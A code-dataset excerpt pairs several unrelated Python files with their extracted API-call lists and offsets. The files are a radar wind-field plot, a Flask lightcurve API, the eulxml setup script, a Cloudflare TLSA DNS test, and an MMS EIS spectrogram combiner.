cpol_h[::barb_density_vert,lat_level,::barb_density],
u['data'][::barb_density_vert,lat_level,::barb_density],
w['data'][::barb_density_vert,lat_level,::barb_density])
cs = plt.contour(cpol_x[::,lat_level,::], cpol_h[::,lat_level,::],
w['data'][::,lat_level,::], levels=np.arange(1,20,2),
linewidth=16, alpha=0.5)
plt.clabel(cs)
plt.xlabel('X [km]', fontsize=20)
plt.ylabel('Z [m]', fontsize=20)
plt.show()
|
[
"pyart.io.read_arm_sonde",
"matplotlib.pyplot.clabel",
"matplotlib.pyplot.show",
"matplotlib.pyplot.interactive",
"pyart.io.read_grid",
"matplotlib.pyplot.barbs",
"matplotlib.pyplot.colorbar",
"pydda.retrieval.get_dd_wind_field",
"matplotlib.pyplot.figure",
"numpy.arange",
"matplotlib.pyplot.pcolormesh",
"pydda.retrieval.make_wind_field_from_profile",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"pydda.vis.plot_horiz_xsection_barbs"
] |
[((95, 137), 'pyart.io.read_grid', 'pyart.io.read_grid', (['"""berr_Darwin_hires.nc"""'], {}), "('berr_Darwin_hires.nc')\n", (113, 137), False, 'import pyart\n'), ((150, 192), 'pyart.io.read_grid', 'pyart.io.read_grid', (['"""cpol_Darwin_hires.nc"""'], {}), "('cpol_Darwin_hires.nc')\n", (168, 192), False, 'import pyart\n'), ((205, 316), 'pyart.io.read_arm_sonde', 'pyart.io.read_arm_sonde', (['"""/home/rjackson/data/soundings/twpsondewnpnC3.b1.20060119.231600.custom.cdf"""'], {}), "(\n '/home/rjackson/data/soundings/twpsondewnpnC3.b1.20060119.231600.custom.cdf'\n )\n", (228, 316), False, 'import pyart\n'), ((597, 683), 'pydda.retrieval.make_wind_field_from_profile', 'pydda.retrieval.make_wind_field_from_profile', (['cpol_grid', 'sounding'], {'vel_field': '"""VT"""'}), "(cpol_grid, sounding, vel_field\n ='VT')\n", (641, 683), False, 'import pydda\n'), ((997, 1246), 'pydda.retrieval.get_dd_wind_field', 'pydda.retrieval.get_dd_wind_field', (['[berr_grid, cpol_grid]', 'u_init', 'v_init', 'w_init'], {'u_back': 'u_back', 'v_back': 'v_back', 'z_back': 'z_back', 'Co': '(100.0)', 'Cm': '(1500.0)', 'vel_name': '"""VT"""', 'refl_field': '"""DT"""', 'frz': '(5000.0)', 'filt_iterations': '(0)', 'mask_w_outside_opt': '(False)'}), "([berr_grid, cpol_grid], u_init, v_init,\n w_init, u_back=u_back, v_back=v_back, z_back=z_back, Co=100.0, Cm=\n 1500.0, vel_name='VT', refl_field='DT', frz=5000.0, filt_iterations=0,\n mask_w_outside_opt=False)\n", (1030, 1246), False, 'import pydda\n'), ((1500, 1526), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(8, 8)'}), '(figsize=(8, 8))\n', (1510, 1526), True, 'from matplotlib import pyplot as plt\n'), ((1526, 1613), 'pydda.vis.plot_horiz_xsection_barbs', 'pydda.vis.plot_horiz_xsection_barbs', (['Grids', '"""DT"""'], {'level': '(6)', 'vel_contours': '[1, 4, 10]'}), "(Grids, 'DT', level=6, vel_contours=[1, \n 4, 10])\n", (1561, 1613), False, 'import pydda\n'), ((1646, 1668), 'matplotlib.pyplot.interactive', 'plt.interactive', (['(False)'], {}), '(False)\n', (1661, 1668), True, 'from matplotlib import pyplot as plt\n'), ((1723, 1751), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (1733, 1751), True, 'from matplotlib import pyplot as plt\n'), ((1751, 1891), 'matplotlib.pyplot.pcolormesh', 'plt.pcolormesh', (['cpol_x[:, lat_level, :]', 'cpol_h[:, lat_level, :]', 'cpol_z[:, lat_level, :]'], {'cmap': 'pyart.graph.cm_colorblind.HomeyerRainbow'}), '(cpol_x[:, lat_level, :], cpol_h[:, lat_level, :], cpol_z[:,\n lat_level, :], cmap=pyart.graph.cm_colorblind.HomeyerRainbow)\n', (1765, 1891), True, 'from matplotlib import pyplot as plt\n'), ((1920, 1949), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {'label': '"""Z [dBZ]"""'}), "(label='Z [dBZ]')\n", (1932, 1949), True, 'from matplotlib import pyplot as plt\n'), ((1950, 2204), 'matplotlib.pyplot.barbs', 'plt.barbs', (['cpol_x[::barb_density_vert, lat_level, ::barb_density]', 'cpol_h[::barb_density_vert, lat_level, ::barb_density]', "u['data'][::barb_density_vert, lat_level, ::barb_density]", "w['data'][::barb_density_vert, lat_level, ::barb_density]"], {}), "(cpol_x[::barb_density_vert, lat_level, ::barb_density], cpol_h[::\n barb_density_vert, lat_level, ::barb_density], u['data'][::\n barb_density_vert, lat_level, ::barb_density], w['data'][::\n barb_density_vert, lat_level, ::barb_density])\n", (1959, 2204), True, 'from matplotlib import pyplot as plt\n'), ((2396, 2410), 'matplotlib.pyplot.clabel', 'plt.clabel', (['cs'], {}), '(cs)\n', (2406, 2410), True, 'from matplotlib import pyplot as plt\n'), ((2411, 2444), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""X [km]"""'], {'fontsize': '(20)'}), "('X [km]', fontsize=20)\n", (2421, 2444), True, 'from matplotlib import pyplot as plt\n'), ((2445, 2477), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Z [m]"""'], {'fontsize': '(20)'}), "('Z [m]', fontsize=20)\n", (2455, 2477), True, 'from matplotlib import pyplot as plt\n'), ((2478, 2488), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2486, 2488), True, 'from matplotlib import pyplot as plt\n'), ((2334, 2353), 'numpy.arange', 'np.arange', (['(1)', '(20)', '(2)'], {}), '(1, 20, 2)\n', (2343, 2353), True, 'import numpy as np\n')]
|
def make_get_toks(f=None):
"make iterator and next functions out of iterable of split strings"
from sys import stdin
from itertools import chain
def sp(ln):
"to split the strings with a map"
return ln.split()
def the_it():
"so that both results are callable in similar manner"
return it
if f is None:
f = stdin
it = chain.from_iterable(map(sp, f))
return the_it, it.__next__
get_toks, get_tok = make_get_toks()
from collections import defaultdict as dd
n, k = int(get_tok()), int(get_tok())
d = dd(int)
on = True
for m in get_toks():
m = int(m)
if m % n == 0:
d[m] += 1
if d[m] >= k and on:
print(m)
on = False
if on:
print("none")
|
[
"collections.defaultdict"
] |
[((577, 584), 'collections.defaultdict', 'dd', (['int'], {}), '(int)\n', (579, 584), True, 'from collections import defaultdict as dd\n')]
|
from flask_restx import Namespace, Resource
from .parsers import survey_id_parser
from .models import (
light_curve_model,
detection_model,
non_detection_model,
)
from dependency_injector.wiring import inject, Provide
from dependency_injector.providers import Factory
from api.container import AppContainer
from shared.interface.command import Command
from shared.interface.command import ResultHandler
from core.light_curve.domain.lightcurve_service import LightcurveServicePayload
from ralidator_flask.decorators import (
set_permissions_decorator,
set_filters_decorator,
check_permissions_decorator,
)
api = Namespace("lightcurve", description="LightCurve related operations")
api.models[light_curve_model.name] = light_curve_model
api.models[detection_model.name] = detection_model
api.models[non_detection_model.name] = non_detection_model
@api.route("/<id>/lightcurve")
@api.param("id", "The object's identifier")
@api.response(200, "Success")
@api.response(404, "Not found")
class LightCurve(Resource):
@set_permissions_decorator(["admin", "basic_user"])
@set_filters_decorator(["filter_atlas_lightcurve"])
@check_permissions_decorator
@api.doc("lightcurve")
@api.marshal_with(light_curve_model, skip_none=True)
@api.expect(survey_id_parser)
@inject
def get(
self,
id,
command_factory: Factory[Command] = Provide[
AppContainer.lightcurve_package.get_lightcurve_command.provider
],
result_handler: ResultHandler = Provide[
AppContainer.view_result_handler
],
):
"""
Gets detections and non detections
"""
survey_id = survey_id_parser.parse_args()["survey_id"]
command = command_factory(
payload=LightcurveServicePayload(id, survey_id),
handler=result_handler,
)
command.execute()
return result_handler.result
@api.route("/<id>/detections")
@api.param("id", "The object's identifier")
@api.response(200, "Success")
@api.response(404, "Not found")
class ObjectDetections(Resource):
@set_permissions_decorator(["admin", "basic_user"])
@set_filters_decorator(["filter_atlas_detections"])
@check_permissions_decorator
@api.doc("detections")
@api.marshal_list_with(detection_model, skip_none=True)
@api.expect(survey_id_parser)
@inject
def get(
self,
id,
command_factory: Factory[Command] = Provide[
AppContainer.lightcurve_package.get_detections_command.provider
],
result_handler: ResultHandler = Provide[
AppContainer.view_result_handler
],
):
"""
Just the detections
"""
survey_id = survey_id_parser.parse_args()["survey_id"]
command = command_factory(
payload=LightcurveServicePayload(id, survey_id),
handler=result_handler,
)
command.execute()
return result_handler.result
@api.route("/<id>/non_detections")
@api.param("id", "The object's identifier")
@api.response(200, "Success")
@api.response(404, "Not found")
class NonDetections(Resource):
@set_permissions_decorator(["admin", "basic_user"])
@set_filters_decorator(["filter_atlas_non_detections"])
@check_permissions_decorator
@api.doc("non_detections")
@api.marshal_list_with(non_detection_model, skip_none=True)
@api.expect(survey_id_parser)
@inject
def get(
self,
id,
command_factory: Factory[Command] = Provide[
AppContainer.lightcurve_package.get_non_detections_command.provider
],
result_handler: ResultHandler = Provide[
AppContainer.view_result_handler
],
):
"""
Just non detections
"""
survey_id = survey_id_parser.parse_args()["survey_id"]
command = command_factory(
payload=LightcurveServicePayload(id, survey_id),
handler=result_handler,
)
command.execute()
return result_handler.result
|
[
"ralidator_flask.decorators.set_permissions_decorator",
"flask_restx.Namespace",
"core.light_curve.domain.lightcurve_service.LightcurveServicePayload",
"ralidator_flask.decorators.set_filters_decorator"
] |
[((636, 704), 'flask_restx.Namespace', 'Namespace', (['"""lightcurve"""'], {'description': '"""LightCurve related operations"""'}), "('lightcurve', description='LightCurve related operations')\n", (645, 704), False, 'from flask_restx import Namespace, Resource\n'), ((1042, 1092), 'ralidator_flask.decorators.set_permissions_decorator', 'set_permissions_decorator', (["['admin', 'basic_user']"], {}), "(['admin', 'basic_user'])\n", (1067, 1092), False, 'from ralidator_flask.decorators import set_permissions_decorator, set_filters_decorator, check_permissions_decorator\n'), ((1098, 1148), 'ralidator_flask.decorators.set_filters_decorator', 'set_filters_decorator', (["['filter_atlas_lightcurve']"], {}), "(['filter_atlas_lightcurve'])\n", (1119, 1148), False, 'from ralidator_flask.decorators import set_permissions_decorator, set_filters_decorator, check_permissions_decorator\n'), ((2116, 2166), 'ralidator_flask.decorators.set_permissions_decorator', 'set_permissions_decorator', (["['admin', 'basic_user']"], {}), "(['admin', 'basic_user'])\n", (2141, 2166), False, 'from ralidator_flask.decorators import set_permissions_decorator, set_filters_decorator, check_permissions_decorator\n'), ((2172, 2222), 'ralidator_flask.decorators.set_filters_decorator', 'set_filters_decorator', (["['filter_atlas_detections']"], {}), "(['filter_atlas_detections'])\n", (2193, 2222), False, 'from ralidator_flask.decorators import set_permissions_decorator, set_filters_decorator, check_permissions_decorator\n'), ((3179, 3229), 'ralidator_flask.decorators.set_permissions_decorator', 'set_permissions_decorator', (["['admin', 'basic_user']"], {}), "(['admin', 'basic_user'])\n", (3204, 3229), False, 'from ralidator_flask.decorators import set_permissions_decorator, set_filters_decorator, check_permissions_decorator\n'), ((3235, 3289), 'ralidator_flask.decorators.set_filters_decorator', 'set_filters_decorator', (["['filter_atlas_non_detections']"], {}), "(['filter_atlas_non_detections'])\n", (3256, 3289), False, 'from ralidator_flask.decorators import set_permissions_decorator, set_filters_decorator, check_permissions_decorator\n'), ((1788, 1827), 'core.light_curve.domain.lightcurve_service.LightcurveServicePayload', 'LightcurveServicePayload', (['id', 'survey_id'], {}), '(id, survey_id)\n', (1812, 1827), False, 'from core.light_curve.domain.lightcurve_service import LightcurveServicePayload\n'), ((2850, 2889), 'core.light_curve.domain.lightcurve_service.LightcurveServicePayload', 'LightcurveServicePayload', (['id', 'survey_id'], {}), '(id, survey_id)\n', (2874, 2889), False, 'from core.light_curve.domain.lightcurve_service import LightcurveServicePayload\n'), ((3929, 3968), 'core.light_curve.domain.lightcurve_service.LightcurveServicePayload', 'LightcurveServicePayload', (['id', 'survey_id'], {}), '(id, survey_id)\n', (3953, 3968), False, 'from core.light_curve.domain.lightcurve_service import LightcurveServicePayload\n')]
|
#!/usr/bin/env python
"""Setup.py for eulxml package"""
from distutils.command.build_py import build_py
from distutils.command.clean import clean
from distutils.command.sdist import sdist
from distutils.core import Command
import os
import sys
import shutil
from setuptools import setup, find_packages
import eulxml
class GenerateXmlCatalog(Command):
'''Custom setup command to generate fresh catalog and schemas'''
user_options = []
def initialize_options(self):
"""init options"""
pass
def finalize_options(self):
"""finalize options"""
pass
def run(self):
from eulxml.catalog import generate_catalog
generate_catalog()
def generate_catalog_if_needed():
# helper method to check if catalog is present, and generate if not
if not os.path.exists(eulxml.XMLCATALOG_FILE):
from eulxml.catalog import generate_catalog
print("Cenerating XML catalog...")
generate_catalog()
class CleanSchemaData(clean):
"""Custom cleanup command to delete build and schema files"""
description = "Custom clean command; remove schema files and XML catalog"
def run(self):
# remove schema data and then do any other normal cleaning
try:
shutil.rmtree(eulxml.XMLCATALOG_DIR)
except OSError:
pass
clean.run(self)
class BuildPyWithPly(build_py):
"""Use ply to generate parsetab and lextab modules."""
def run(self):
# importing this forces ply to generate parsetab/lextab
import eulxml.xpath.core
generate_catalog_if_needed()
build_py.run(self)
class SdistWithCatalog(sdist):
"""Extend sdist command to ensure schema catalog is included."""
def run(self):
generate_catalog_if_needed()
sdist.run(self)
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Text Processing :: Markup :: XML',
]
LONG_DESCRIPTION = None
try:
# read the description if it's there
with open('README.rst') as desc_f:
LONG_DESCRIPTION = desc_f.read()
except:
pass
dev_requirements = [
'sphinx>=1.3.5',
'coverage',
'Django<1.9',
'rdflib>=3.0',
'mock',
'nose',
'tox',
'requests',
]
# NOTE: dev requirements should be duplicated in pip-dev-req.txt
# for generating documentation on readthedocs.org
# unittest2 should only be included for py2.6
if sys.version_info < (2, 7):
dev_requirements.append('unittest2')
setup(
cmdclass={
'build_py': BuildPyWithPly,
'clean': CleanSchemaData,
'sdist': SdistWithCatalog,
'xmlcatalog': GenerateXmlCatalog
},
name='eulxml',
version=eulxml.__version__,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/emory-libraries/eulxml',
license='Apache License, Version 2.0',
packages=find_packages(),
setup_requires=[
'ply>=3.8',
],
install_requires=[
'ply>=3.8',
'lxml>=3.4',
'six>=1.10',
],
extras_require={
'django': ['Django<1.9'],
'rdf': ['rdflib>=3.0'],
'dev': dev_requirements
},
package_data={'eulxml': [
# include schema catalog and all downloaded schemas in the package
'%s/*' % eulxml.SCHEMA_DATA_DIR
]},
description='XPath-based XML data binding, with Django form support',
long_description=LONG_DESCRIPTION,
classifiers=CLASSIFIERS,
)
|
[
"distutils.command.build_py.build_py.run",
"distutils.command.clean.clean.run",
"os.path.exists",
"distutils.command.sdist.sdist.run",
"shutil.rmtree",
"eulxml.catalog.generate_catalog",
"setuptools.find_packages"
] |
[((676, 694), 'eulxml.catalog.generate_catalog', 'generate_catalog', ([], {}), '()\n', (692, 694), False, 'from eulxml.catalog import generate_catalog\n'), ((814, 852), 'os.path.exists', 'os.path.exists', (['eulxml.XMLCATALOG_FILE'], {}), '(eulxml.XMLCATALOG_FILE)\n', (828, 852), False, 'import os\n'), ((957, 975), 'eulxml.catalog.generate_catalog', 'generate_catalog', ([], {}), '()\n', (973, 975), False, 'from eulxml.catalog import generate_catalog\n'), ((1351, 1366), 'distutils.command.clean.clean.run', 'clean.run', (['self'], {}), '(self)\n', (1360, 1366), False, 'from distutils.command.clean import clean\n'), ((1624, 1642), 'distutils.command.build_py.build_py.run', 'build_py.run', (['self'], {}), '(self)\n', (1636, 1642), False, 'from distutils.command.build_py import build_py\n'), ((1810, 1825), 'distutils.command.sdist.sdist.run', 'sdist.run', (['self'], {}), '(self)\n', (1819, 1825), False, 'from distutils.command.sdist import sdist\n'), ((3501, 3516), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (3514, 3516), False, 'from setuptools import setup, find_packages\n'), ((1265, 1301), 'shutil.rmtree', 'shutil.rmtree', (['eulxml.XMLCATALOG_DIR'], {}), '(eulxml.XMLCATALOG_DIR)\n', (1278, 1301), False, 'import shutil\n')]
|
import pytest
import re
from pathlib import Path
from time import sleep
from alnitak import config
from alnitak.api import cloudflare
from alnitak.tests import setup
from alnitak import prog as Prog
from alnitak import exceptions as Except
@pytest.fixture(scope="module")
def cloudflare_api(request):
return Path(request.fspath.dirname) / 'cloudflare.api'
def api_file_exists(cloudflare_api):
if cloudflare_api.exists():
return True
return False
def get_domain(api_path):
with open(str(api_path), 'r') as file:
lines = file.read().splitlines()
domain = None
for l in lines:
m = re.match(r'\s*#.*domain:\s*(?P<domain>\S+)\s*$', l)
if m:
domain = m.group('domain')
return domain
def test_cloudflare(cloudflare_api):
if not api_file_exists(cloudflare_api):
pytest.skip("no cloudflare.api file")
# need the domain
domain = get_domain(cloudflare_api)
assert domain
s = setup.Init(keep=True)
s.create_cloudflare_config(cloudflare_api, domain)
prog = setup.create_state_obj(s, config=s.configC1)
# need this to log if create_state_obj set 'log=True', otherwise this will
# do nothing.
with prog.log:
retval = config.read(prog)
assert retval == Prog.RetVal.ok
t_a2 = setup.create_tlsa_obj('211', '53527', 'tcp', domain)
t_a1 = setup.create_tlsa_obj('311', '53527', 'tcp', domain)
assert len(prog.target_list) == 1
target = prog.target_list[0]
assert len(target.tlsa) == 2
assert t_a1 in target.tlsa
assert t_a2 in target.tlsa
tlsa1 = target.tlsa[0]
tlsa2 = target.tlsa[1]
api = target.api
assert api.domain == domain
assert len(api.email) > 0
assert len(api.key) > 0
hash211 = s.hash['a.com']['cert1'][211]
hash311 = s.hash['a.com']['cert1'][311]
cloudflare.api_publish(prog, api, tlsa1, hash211)
cloudflare.api_publish(prog, api, tlsa2, hash311)
# error encountered: Except.DNSProcessingError
# record is already up: Except.DNSSkipProcessing
sleep(3)
records211 = cloudflare.api_read(prog, api, tlsa1)
records311 = cloudflare.api_read(prog, api, tlsa2)
# error encountered: Except.DNSProcessingError
# record is not up: Except.DNSNotLive
assert len(records211) == 1
assert hash211 in records211
assert len(records311) == 1
assert hash311 in records311
id211 = records211[hash211]
id311 = records311[hash311]
sleep(3)
cloudflare.api_delete(prog, api, tlsa1, id211)
cloudflare.api_delete(prog, api, tlsa2, id311)
# error encountered: Except.DNSProcessingError
sleep(3)
with pytest.raises(Except.DNSNotLive) as ex:
cloudflare.api_read(prog, api, tlsa1)
with pytest.raises(Except.DNSNotLive) as ex:
cloudflare.api_read(prog, api, tlsa2)
|
[
"alnitak.tests.setup.Init",
"alnitak.api.cloudflare.api_delete",
"alnitak.api.cloudflare.api_publish",
"alnitak.tests.setup.create_tlsa_obj",
"alnitak.tests.setup.create_state_obj",
"pytest.fixture",
"re.match",
"pytest.skip",
"time.sleep",
"alnitak.config.read",
"pathlib.Path",
"pytest.raises",
"alnitak.api.cloudflare.api_read"
] |
[((245, 275), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (259, 275), False, 'import pytest\n'), ((975, 996), 'alnitak.tests.setup.Init', 'setup.Init', ([], {'keep': '(True)'}), '(keep=True)\n', (985, 996), False, 'from alnitak.tests import setup\n'), ((1064, 1108), 'alnitak.tests.setup.create_state_obj', 'setup.create_state_obj', (['s'], {'config': 's.configC1'}), '(s, config=s.configC1)\n', (1086, 1108), False, 'from alnitak.tests import setup\n'), ((316, 344), 'pathlib.Path', 'Path', (['request.fspath.dirname'], {}), '(request.fspath.dirname)\n', (320, 344), False, 'from pathlib import Path\n'), ((633, 687), 're.match', 're.match', (['"""\\\\s*#.*domain:\\\\s*(?P<domain>\\\\S+)\\\\s*$"""', 'l'], {}), "('\\\\s*#.*domain:\\\\s*(?P<domain>\\\\S+)\\\\s*$', l)\n", (641, 687), False, 'import re\n'), ((847, 884), 'pytest.skip', 'pytest.skip', (['"""no cloudflare.api file"""'], {}), "('no cloudflare.api file')\n", (858, 884), False, 'import pytest\n'), ((1244, 1261), 'alnitak.config.read', 'config.read', (['prog'], {}), '(prog)\n', (1255, 1261), False, 'from alnitak import config\n'), ((1318, 1370), 'alnitak.tests.setup.create_tlsa_obj', 'setup.create_tlsa_obj', (['"""211"""', '"""53527"""', '"""tcp"""', 'domain'], {}), "('211', '53527', 'tcp', domain)\n", (1339, 1370), False, 'from alnitak.tests import setup\n'), ((1386, 1438), 'alnitak.tests.setup.create_tlsa_obj', 'setup.create_tlsa_obj', (['"""311"""', '"""53527"""', '"""tcp"""', 'domain'], {}), "('311', '53527', 'tcp', domain)\n", (1407, 1438), False, 'from alnitak.tests import setup\n'), ((1925, 1974), 'alnitak.api.cloudflare.api_publish', 'cloudflare.api_publish', (['prog', 'api', 'tlsa1', 'hash211'], {}), '(prog, api, tlsa1, hash211)\n', (1947, 1974), False, 'from alnitak.api import cloudflare\n'), ((1983, 2032), 'alnitak.api.cloudflare.api_publish', 'cloudflare.api_publish', (['prog', 'api', 'tlsa2', 'hash311'], {}), '(prog, api, tlsa2, hash311)\n', (2005, 2032), False, 'from alnitak.api import cloudflare\n'), ((2154, 2162), 'time.sleep', 'sleep', (['(3)'], {}), '(3)\n', (2159, 2162), False, 'from time import sleep\n'), ((2185, 2222), 'alnitak.api.cloudflare.api_read', 'cloudflare.api_read', (['prog', 'api', 'tlsa1'], {}), '(prog, api, tlsa1)\n', (2204, 2222), False, 'from alnitak.api import cloudflare\n'), ((2244, 2281), 'alnitak.api.cloudflare.api_read', 'cloudflare.api_read', (['prog', 'api', 'tlsa2'], {}), '(prog, api, tlsa2)\n', (2263, 2281), False, 'from alnitak.api import cloudflare\n'), ((2613, 2621), 'time.sleep', 'sleep', (['(3)'], {}), '(3)\n', (2618, 2621), False, 'from time import sleep\n'), ((2631, 2677), 'alnitak.api.cloudflare.api_delete', 'cloudflare.api_delete', (['prog', 'api', 'tlsa1', 'id211'], {}), '(prog, api, tlsa1, id211)\n', (2652, 2677), False, 'from alnitak.api import cloudflare\n'), ((2686, 2732), 'alnitak.api.cloudflare.api_delete', 'cloudflare.api_delete', (['prog', 'api', 'tlsa2', 'id311'], {}), '(prog, api, tlsa2, id311)\n', (2707, 2732), False, 'from alnitak.api import cloudflare\n'), ((2797, 2805), 'time.sleep', 'sleep', (['(3)'], {}), '(3)\n', (2802, 2805), False, 'from time import sleep\n'), ((2820, 2852), 'pytest.raises', 'pytest.raises', (['Except.DNSNotLive'], {}), '(Except.DNSNotLive)\n', (2833, 2852), False, 'import pytest\n'), ((2872, 2909), 'alnitak.api.cloudflare.api_read', 'cloudflare.api_read', (['prog', 'api', 'tlsa1'], {}), '(prog, api, tlsa1)\n', (2891, 2909), False, 'from alnitak.api import cloudflare\n'), ((2924, 2956), 'pytest.raises', 'pytest.raises', (['Except.DNSNotLive'], {}), '(Except.DNSNotLive)\n', (2937, 2956), False, 'import pytest\n'), ((2976, 3013), 'alnitak.api.cloudflare.api_read', 'cloudflare.api_read', (['prog', 'api', 'tlsa2'], {}), '(prog, api, tlsa2)\n', (2995, 3013), False, 'from alnitak.api import cloudflare\n')]
|
import numpy as np
# use nanmean from bottleneck if it's installed, otherwise use the numpy one
# bottleneck nanmean is ~2.5x faster
try:
import bottleneck as bn
nanmean = bn.nanmean
except ImportError:
nanmean = np.nanmean
from pytplot import get_data, store_data, options
from ...utilities.tnames import tnames
def mms_eis_spec_combine_sc(
species='proton', data_units='flux', datatype='extof', data_rate='srvy',
level='l2', suffix='',
):
'''
Combines omni-directional energy spectrogram variable from EIS on multiple
MMS spacecraft.
Parameters
----------
datatype: str
'extof', 'electroenergy', or 'phxtof' (default: 'extof')
data_rate: str
instrument data rate, e.g., 'srvy' or 'brst' (default: 'srvy')
level: str
data level ['l1a','l1b','l2pre','l2' (default)]
data_units: str
desired units for data, e.g., 'flux' or 'cps' (default: 'flux')
suffix: str
suffix of the loaded data; useful for preserving original tplot var
species: str
species for calculation, e.g., proton, oxygen, alpha or electron
(default: 'proton')
Returns:
Name of tplot variables created.
'''
## Thoughts for extensions:
## - Ensure arguments passed to modules are of lowecase
if data_units == 'flux':
units_label = 'Intensity\n[1/cm^2-sr-s-keV]'
elif data_units == 'cps':
units_label = 'CountRate\n[counts/s]'
elif data_units == 'counts':
units_label = 'Counts\n[counts]'
#assert type(datatype) is str
if not isinstance(species, list): species = [species]
if not isinstance(datatype, list): datatype = [datatype]
out_vars = []
for species_id in species:
for dtype in datatype:
# retrieve: omni variables of species to determine # of probes
_species = species_id
if dtype == 'electronenergy':
_species = 'electron'
eis_sc_check = tnames('mms*eis*' + data_rate + '*' + dtype+'*' + _species + '*' + data_units + '*omni'+ suffix)
# process multiple probes
probes = []
for name in eis_sc_check:
probes.append(name[3:4])
if len(probes) > 4:
probes = probes[:-2]
if len(probes) > 1:
probe_string = probes[0] + '-' + probes[-1]
else:
if probes:
probe_string = probes[0]
else:
print('No probes found from eis_sc_check tnames.')
return
allmms_prefix = 'mmsx_epd_eis_' + data_rate + '_' + level + '_' + dtype + '_'
# DETERMINE SPACECRAFT WITH SMALLEST NUMBER OF TIME STEPS TO USE
# AS A REFERENCE SPACECRAFT
omni_vars = tnames('mms?_epd_eis_'+data_rate+'_'+level+'_'+dtype+'_'+_species+'_'+data_units+'_omni'+suffix)
if not omni_vars:
print('No EIS '+dtype+'data loaded!')
return
time_size = np.zeros(len(probes))
energy_size = np.zeros(len(probes))
# Retrieve probe's pitch angle dist for all 6 (omni) telescopes
for p, probe in enumerate(probes):
# note: return from get_data here is (times, data, v)
# according to https://github.com/MAVENSDC/PyTplot/blob/ec87591521e84bae8d81caccaf64fc2a5785186f/pytplot/get_data.py#L66
# note: there are also available 'spec_bins' values
#print(pytplot.data_quants[omni_vars[p]].coords)
#t, data, v = get_data(omni_vars[p])
omni_times, omni_data, omni_energies = get_data(omni_vars[p])
time_size[p] = len(omni_times)
energy_size[p] = len(omni_energies)
reftime_sc_loc = np.argmin(time_size)
ref_sc_time_size = int(min(time_size))
refenergy_sc_loc = np.argmin(energy_size)
ref_sc_energy_size = int(min(energy_size))
prefix = 'mms'+probes[reftime_sc_loc]+'_epd_eis_'+data_rate+'_'+level+'_'+dtype+'_'
# Retrieve specific probe's data based on minimum time/energy
# Note: I did not split these tuples as the namespace is reused, i.e., "_refprobe"
time_refprobe = get_data(omni_vars[reftime_sc_loc])
energy_refprobe = get_data(omni_vars[refenergy_sc_loc])
# time x energy x spacecraft
omni_spec_data = np.empty([len(time_refprobe[0]), len(energy_refprobe[2]), len(probes)])
omni_spec_data[:] = np.nan
# time x energy
omni_spec = np.empty([len(time_refprobe[0]), len(energy_refprobe[2])])
omni_spec[:] = np.nan
energy_data = np.zeros([len(energy_refprobe[2]), len(probes)])
common_energy = np.zeros(len(energy_refprobe[2]))
# Average omni flux over all spacecraft and define common energy grid
for pp in range(len(omni_vars)):
temp_data = get_data(omni_vars[pp])
energy_data[:,pp] = temp_data[2][0:len(common_energy)]
omni_spec_data[0:ref_sc_time_size,:,pp] = temp_data[1][0:ref_sc_time_size,0:len(common_energy)]
for ee in range(len(common_energy)):
common_energy[ee] = nanmean(energy_data[ee,:], axis=0)
# Average omni flux over all spacecraft
for tt in range(len(time_refprobe[0])):
for ee in range(len(energy_refprobe[2])):
omni_spec[tt,ee] = nanmean(omni_spec_data[tt,ee,:], axis=0)
# store new tplot variable
omni_spec[np.isnan(omni_spec)] = 0.
new_name = allmms_prefix+_species+'_'+data_units+'_omni'
store_data(new_name, data={'x':time_refprobe[0], 'y':omni_spec, 'v':energy_refprobe[2]})
options(new_name, 'ylog', True)
options(new_name, 'zlog', True)
options(new_name, 'spec', True)
options(new_name, 'Colormap', 'jet')
options(new_name, 'ztitle', units_label)
options(new_name, 'ytitle', ' \\ '.join(['mms'+probe_string, _species.upper(), 'Energy [keV]']))
out_vars.append(new_name)
# Spin-average the data
spin_nums = get_data(prefix+'spin'+suffix)
if spin_nums is None:
print('Error: Could not find EIS spin variable -- now ending procedure.')
return
# find where the spin starts
_, spin_starts = np.unique(spin_nums[1], return_index=True)
spin_sum_flux = np.zeros([len(spin_starts), len(omni_spec[0,:])])
current_start = 0
for spin_idx in range(len(spin_starts)):
spin_sum_flux[spin_idx,:] = nanmean(omni_spec[current_start:spin_starts[spin_idx],:], axis=0)
current_start = spin_starts[spin_idx] + 1
sp = '_spin'
new_name = allmms_prefix+_species+'_'+data_units+'_omni'+sp
store_data(new_name, data={'x':spin_nums[0][spin_starts], 'y':spin_sum_flux, 'v':energy_refprobe[2]})
options(new_name, 'spec', True)
options(new_name, 'zlog', True)
options(new_name, 'ylog', True)
options(new_name, 'spec', True)
out_vars.append(new_name)
return out_vars
|
[
"pytplot.store_data",
"numpy.argmin",
"pytplot.get_data",
"numpy.isnan",
"pytplot.options",
"numpy.unique"
] |
